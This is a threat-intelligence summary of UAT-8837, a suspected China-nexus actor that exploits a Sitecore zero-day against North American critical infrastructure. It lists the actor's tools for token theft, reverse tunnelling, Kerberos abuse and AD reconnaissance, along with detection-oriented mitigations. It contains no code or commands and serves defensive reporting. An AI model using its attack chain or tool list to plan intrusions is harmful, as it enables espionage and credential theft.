Full Report
A threat actor likely aligned with China has been observed targeting critical infrastructure sectors in North America since at least last year. Cisco Talos, which is tracking the activity under the name UAT-8837, assessed it to be a China-nexus advanced persistent threat (APT) actor with medium confidence based on tactical overlaps with other campaigns mounted by threat actors from the region.
Analysis Summary
# Threat Actor: UAT-8837
## Attribution & Identity
The threat actor is tracked by Cisco Talos under the name **UAT-8837**. It is assessed with medium confidence to be a **China-nexus Advanced Persistent Threat (APT) actor** based on tactical overlaps with other regional campaigns.
## Activity Summary
UAT-8837 has been observed operating since at least last year, primarily focused on obtaining initial access to high-value organizations. Most recently, the actor exploited a critical zero-day vulnerability in Sitecore (**CVE-2025-53690**, CVSS 9.0) to gain a foothold. Their activity shows tactical, tooling, and infrastructure similarities with a campaign detailed by Mandiant in September 2025, suggesting the actor may possess zero-day exploits. Upon gaining access, the actor focuses on reconnaissance, credential harvesting, and establishing persistence. In one observed instance, the actor exfiltrated DLL-based shared libraries, hinting at potential future supply chain compromise opportunities.
## Tactics, Techniques & Procedures
- **Initial Access:** Successful exploitation of vulnerable servers (e.g., Sitecore zero-day CVE-2025-53690) or using compromised credentials.
- **Post-Compromise Configuration:** Disabling **RestrictedAdmin** for Remote Desktop Protocol (RDP) to reduce credential exposure risks.
- **Hands-on-Keyboard Activity:** Running `cmd.exe` for local execution and reconnaissance.
- **Information Gathering:** Collecting domain, Active Directory (AD) information, security configurations, and credentials.
- **Establishing Persistence & Lateral Movement:** Deploying multiple open-source tools to create access channels and move within the network.
- **Specific Tools Deployed:**
- **GoTokenTheft:** To steal access tokens.
- **EarthWorm:** To create a reverse tunnel to attacker-controlled servers using SOCKS.
- **DWAgent:** For persistent remote access and Active Directory reconnaissance.
- **SharpHound:** To collect Active Directory information.
- **Impacket:** Likely used to run commands with elevated privileges.
- **GoExec:** A Golang-based tool to execute commands on connected remote endpoints.
- **Rubeus:** A C# toolset for Kerberos interaction and abuse.
- **Certipy:** For Active Directory discovery and abuse.
## Targeting
- **Sectors:** Critical Infrastructure sectors.
- **Geography:** North America.
- **Victims:** High-value organizations. (Note: Specific victim names are not provided in the text.)
## Tools & Infrastructure
- **Malware Families used:** Primarily relies on open-source tools rather than custom proprietary malware, including those listed above.
- **Infrastructure (C2, domains, IPs - defang URLs):** Attacker-controlled servers utilized for reverse tunneling (via EarthWorm). Associated infrastructure details are inferred by overlaps with other Mandiant-detailed campaigns.
## Implications
UAT-8837 poses a significant threat to critical infrastructure, utilizing sophisticated initial access techniques (including zero-days like the Sitecore vulnerability) to conduct espionage. Their focus on harvesting credentials and AD information indicates a high objective for establishing deep, persistent access. The exfiltration of product DLLs suggests a potential future vector focusing on supply chain compromise or reverse engineering to identify product vulnerabilities.
## Mitigations
- **Patch Management:** Prioritize patching for known vulnerabilities, especially the exploited Sitecore zero-day (CVE-2025-53690).
- **Credential Monitoring:** Monitor for suspicious post-exploitation activity, particularly attempts to harvest credentials or disable RDP security controls like RestrictedAdmin.
- **Endpoint Detection & Response (EDR):** Implement robust detection for the execution of known open-source penetration testing tools (GoTokenTheft, SharpHound, Impacket, Rubeus, Certipy).
- **Network Monitoring:** Monitor for reverse tunnel creation indicative of EarthWorm usage.
- **Supply Chain Security:** Review processes related to vendor software libraries, particularly if product DLLs are handled or developed in-house, due to the observed exfiltration of such code.